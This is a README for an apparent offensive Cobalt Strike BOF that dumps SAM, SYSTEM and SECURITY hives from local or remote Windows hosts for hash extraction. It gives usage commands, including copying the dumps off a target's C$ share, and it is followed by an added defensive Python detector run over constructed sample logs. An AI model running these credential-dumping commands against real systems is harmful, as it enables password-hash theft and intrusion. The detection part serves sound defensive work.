Cobalt Strike Beacon Object File (BOF) that uses the RegConnectRegistryA and RegOpenKeyExA APIs to dump registry hives on a remote computer

Hagrid29/BOF-RemoteRegSave

BOF - RemoteRegSave

A fork of RegSave BOF. Dumps the SAM, SYSTEM and SECURITY registry hives on a local or remote computer using RegConnectRegistryA and RegOpenKeyExA, for offline parsing and hash extraction.

Usage

Dump registry key hives on the local computer (admin elevation required):

RegSave --path [file path <optional>]

Dump registry key hives on a remote computer (the RemoteRegistry service is enabled automatically if it is disabled):

RegSave --pc remotePC --path [file path <optional>]
shell copy \\remoteSrv\C$\Windows\temp\HG029* .
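
For defenders, the remote usage above leaves two artifacts on the target: the RemoteRegistry service being enabled, and HG029* files under C:\Windows\Temp. The following is an added example, not part of this repository, that correlates the two over constructed log records; the record layout, the host names, and the assumption that the service change surfaces as Service Control Manager event 7040 and the file write as Sysmon event 11 are mine.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Default output location shown in the README; a custom --path defeats this pattern.
HIVE_FILE = re.compile(r"^C:\\Windows\\Temp\\HG029[^\\]*$", re.IGNORECASE)
# Text of SCM event 7040 when a disabled Remote Registry service is re-enabled.
SVC_ENABLED = re.compile(r"Remote Registry service was changed from disabled", re.IGNORECASE)

# Constructed sample records (simplified fields, not real telemetry).
EVENTS = [
    {"time": "2024-05-01T10:00:05", "host": "SRV01", "id": 7040,
     "message": "The start type of the Remote Registry service was changed "
                "from disabled to demand start."},
    {"time": "2024-05-01T10:00:09", "host": "SRV01", "id": 11,
     "target": r"C:\Windows\Temp\HG029_sample_1"},
    {"time": "2024-05-01T11:30:00", "host": "WS07", "id": 7040,
     "message": "The start type of the Remote Registry service was changed "
                "from disabled to demand start."},
    {"time": "2024-05-01T12:00:00", "host": "SRV02", "id": 11,
     "target": r"C:\Windows\Temp\HG029_sample_2"},
    {"time": "2024-05-01T12:05:00", "host": "WS09", "id": 11,
     "target": r"C:\Windows\Temp\setup.log"},
]

def detect(events, window=timedelta(minutes=5)):
    """Return {host: severity}.

    'high'   = service re-enabled, then an HG029* file appears within `window`.
    'medium' = only one of the two artifacts was seen on the host.
    """
    svc, files = defaultdict(list), defaultdict(list)
    for e in events:
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 7040 and SVC_ENABLED.search(e.get("message", "")):
            svc[e["host"]].append(t)
        elif e["id"] == 11 and HIVE_FILE.match(e.get("target", "")):
            files[e["host"]].append(t)
    findings = {}
    for host in set(svc) | set(files):
        paired = any(timedelta(0) <= f - s <= window
                     for s in svc[host] for f in files[host])
        findings[host] = "high" if paired else "medium"
    return findings

if __name__ == "__main__":
    for host, severity in sorted(detect(EVENTS).items()):
        print(host, severity)
```

A host where RemoteRegistry was already enabled produces only the file artifact, so the medium findings still need review rather than being dropped.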

Compile

cd SOURCE
make
